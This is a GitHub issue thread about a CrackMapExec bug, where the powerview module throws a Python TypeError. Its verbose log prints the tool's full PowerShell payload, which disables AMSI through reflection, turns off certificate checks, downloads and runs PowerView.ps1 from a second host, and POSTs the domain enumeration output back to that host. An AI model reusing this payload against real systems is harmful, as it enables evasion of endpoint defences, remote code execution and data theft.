### ISSUE TITLE
No Output/python exception when powerview module is invoked

### ISSUE THREAD

**Issue by sajithshetty** [byt3bl33d3r/CrackMapExec#185]
## Steps to reproduce

crackmapexec smb 192.168.0.27 -t 100 -u Administrator -p "P@ssw0rd!23" -d MYDCDOMAINNAME -M powerview -o COMMAND=Get-NetDomain --verbose

## CME verbose output (using the --verbose flag)
```
> DEBUG                                          {'domain': 'MYDCDOMAINNAME', 'wdigest': None, 'verbose': True, 'sam': False, 'cred_id': [], 'module_options': ['COMMAND=Get-NetDomain'], 'fail_limit': None, 'share': 'C$', 'lusers': False, 'module': 'powerview', 'smb_port': 445, 'show_options': False, 'rid_brute': None, 'uac': False, 'ufail_limit': None, 'pass_pol': False, 'regex': None, 'list_modules': False, 'no_output': False, 'pattern': None, 'lsa': False, 'force_ps32': False, 'shares': False, 'content': False, 'server_host': '0.0.0.0', 'wmi': None, 'exclude_dirs': '', 'server_port': None, 'wmi_namespace': '//./root/cimv2', 'gfail_limit': None, 'mssql_query': None, 'username': ['Administrator'], 'hash': [], 'users': False, 'sessions': False, 'exec_method': None, 'spider': None, 'ps_execute': None, 'threads': 100, 'mssql_port': 1433, 'password': ['P@ssw0rd!23'], 'mssql': False, 'mssql_auth': 'windows', 'ntds_pwdLastSet': False, 'execute': None, 'target': ['smb', '192.168.0.24'], 'ntds_history': False, 'disks': False, 'ntds': None, 'server': 'https', 'depth': 10, 'local_auth': False, 'timeout': 20}
> DEBUG                                          CME server type: https
> CME          192.168.0.24:445 DC_COMP_NAME    [*] Windows 6.1 Build 7601 (name:DC_COMP_NAME) (domain:MYDCDOMAINNAME)
> CME          192.168.0.24:445 DC_COMP_NAME    [+] MYDCDOMAINNAME\Administrator:P@ssw0rd!23 (Pwn3d!)
> DEBUG                                          Payload: 
>         IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.15:443/PowerView.ps1');
>         $data = Get-NetDomain | Out-String
>         $request = [System.Net.WebRequest]::Create('https://192.168.0.15:443/');
>         $request.Method = 'POST';
>         $request.ContentType = 'application/x-www-form-urlencoded';
>         $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
>         $request.ContentLength = $bytes.Length;
>         $requestStream = $request.GetRequestStream();
>         $requestStream.Write( $bytes, 0, $bytes.Length );
>         $requestStream.Close();
>         $request.GetResponse();
> DEBUG                                          Unincoded command:
> [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
> try{ 
> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
> }catch{}
> 
>         IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.15:443/PowerView.ps1');
>         $data = Get-NetDomain | Out-String
>         $request = [System.Net.WebRequest]::Create('https://192.168.0.15:443/');
>         $request.Method = 'POST';
>         $request.ContentType = 'application/x-www-form-urlencoded';
>         $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
>         $request.ContentLength = $bytes.Length;
>         $requestStream = $request.GetRequestStream();
>         $requestStream.Write( $bytes, 0, $bytes.Length );
>         $requestStream.Close();
>         $request.GetResponse();
> 
> DEBUG                                          Executed command via atexec
> POWERVIEW    192.168.0.24:445 DC_COMP_NAME    [+] Executed payload
> POWERVIEW                                      [*] Waiting on 1 host(s)
> ----------------------------------------
> Exception happened during processing of request from ('192.168.0.24', 62442)
> Traceback (most recent call last):
>   File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
>     self.process_request(request, client_address)
>   File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
>     self.finish_request(request, client_address)
>   File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
>     self.RequestHandlerClass(request, client_address, self)
>   File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
>     self.handle()
>   File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
>     self.handle_one_request()
>   File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
>     method()
>   File "/usr/local/lib/python2.7/dist-packages/cme/cmeserver.py", line 24, in do_GET
>     self.server.module.on_request(self.server.context, self)
> TypeError: on_request() takes exactly 5 arguments (3 given)
> ----------------------------------------
> ----------------------------------------
> Exception happened during processing of request from ('192.168.0.24', 62443)
> Traceback (most recent call last):
>   File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
>     self.process_request(request, client_address)
>   File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
>     self.finish_request(request, client_address)
>   File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
>     self.RequestHandlerClass(request, client_address, self)
>   File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
>     self.handle()
>   File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
>     self.handle_one_request()
>   File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
>     method()
>   File "/usr/local/lib/python2.7/dist-packages/cme/cmeserver.py", line 24, in do_GET
>     self.server.module.on_request(self.server.context, self)
> TypeError: on_request() takes exactly 5 arguments (3 given)
> ----------------------------------------
> POWERVIEW    192.168.0.24                      [*] - - "POST / HTTP/1.1" 200 -
> [*] KTHXBYE!
```
## OS
Debian (kali linux )
## Target OS
windows 7 professional 64bit
## Detailed issue explanation
I am trying to run powerview module on remote system using crackmapexec tool but i get an error as shown above or in some case  [*] Waiting on 1 host(s) message..

**Comment by byt3bl33d3r** [comment]
@sajithshetty what version of CME is this?

**Comment by sajithshetty** [comment]
CME version  >  3.1.5 - 'Smidge'

**Comment by mpgn** [comment]
Closed as powerview module doesn't exist anymore
